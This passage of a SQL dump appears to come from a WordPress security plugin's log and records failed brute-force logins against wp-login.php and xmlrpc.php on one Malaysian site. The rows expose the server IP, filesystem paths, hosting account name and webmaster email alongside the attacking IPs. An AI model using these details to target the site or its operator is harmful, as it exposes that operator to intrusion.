23:46:52',17738840,19229592,'https://bintara.com.my/wp-login.php',1,0,'150.164.122.1'),(23960,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"150.164.122.1\";s:11:\"REMOTE_PORT\";s:5:\"43888\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX7NcOBXE2JRepjOtvl-kgAAAAA\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:13:\"1568591216.42\";s:12:\"REQUEST_TIME\";s:10:\"1568591216\";}}','notice','2019-09-15 23:46:58','2019-09-15 23:46:56',18257096,19556928,'https://bintara.com.my/xmlrpc.php',1,0,'150.164.122.1'),(23961,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"92\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"213.122.172.69\";s:11:\"REMOTE_PORT\";s:5:\"33631\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX7P7uBXE2JRepjOtvmDxQAAAAA\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568591854.8235\";s:12:\"REQUEST_TIME\";s:10:\"1568591854\";}}','notice','2019-09-15 23:57:36','2019-09-15 23:57:35',17740528,19231376,'https://bintara.com.my/wp-login.php',1,0,'213.122.172.69'),(23962,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"213.122.172.69\";s:11:\"REMOTE_PORT\";s:5:\"34857\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX7P8uBXE2JRepjOtvmDygAAAAk\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568591858.5574\";s:12:\"REQUEST_TIME\";s:10:\"1568591858\";}}','notice','2019-09-15 23:57:39','2019-09-15 23:57:38',18254472,19551408,'https://bintara.com.my/xmlrpc.php',1,0,'213.122.172.69'),(23963,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"90\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"159.253.32.120\";s:11:\"REMOTE_PORT\";s:5:\"50562\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX7SzuBXE2JRepjOtvmF5wAAAAM\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568592590.8421\";s:12:\"REQUEST_TIME\";s:10:\"1568592590\";}}','notice','2019-09-16 00:09:52','2019-09-16 00:09:51',17739200,19230576,'https://bintara.com.my/wp-login.php',1,0,'159.253.32.120'),(23964,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"159.253.32.120\";s:11:\"REMOTE_PORT\";s:5:\"51114\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX7S0uBXE2JRepjOtvmF6wAAAAo\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568592594.5242\";s:12:\"REQUEST_TIME\";s:10:\"1568592594\";}}','notice','2019-09-16 00:09:56','2019-09-16 00:09:55',18254472,19551408,'https://bintara.com.my/xmlrpc.php',1,0,'159.253.32.120'),(23965,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"89\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"104.238.125.133\";s:11:\"REMOTE_PORT\";s:5:\"50828\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX7VgOBXE2JRepjOtvmIDAAAABM\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568593280.8819\";s:12:\"REQUEST_TIME\";s:10:\"1568593280\";}}','notice','2019-09-16 00:21:22','2019-09-16 00:21:21',17740040,19230480,'https://bintara.com.my/wp-login.php',1,0,'104.238.125.133'),(23966,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"104.238.125.133\";s:11:\"REMOTE_PORT\";s:5:\"51290\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX7Vg@BXE2JRepjOtvmIDwAAAAI\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568593283.6905\";s:12:\"REQUEST_TIME\";s:10:\"1568593283\";}}','notice','2019-09-16 00:21:25','2019-09-16 00:21:24',18252096,19549160,'https://bintara.com.my/xmlrpc.php',1,0,'104.238.125.133'),(23967,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"92\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"213.122.172.69\";s:11:\"REMOTE_PORT\";s:5:\"33664\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX7YEOesTgPVjZVPWms4cAAAAMc\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568593936.4016\";s:12:\"REQUEST_TIME\";s:10:\"1568593936\";}}','notice','2019-09-16 00:32:17','2019-09-16 00:32:16',17739720,19231520,'https://bintara.com.my/wp-login.php',1,0,'213.122.172.69'),(23968,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"213.122.172.69\";s:11:\"REMOTE_PORT\";s:5:\"34854\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX7YE@esTgPVjZVPWms4cgAAANI\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568593939.7016\";s:12:\"REQUEST_TIME\";s:10:\"1568593939\";}}','notice','2019-09-16 00:32:21','2019-09-16 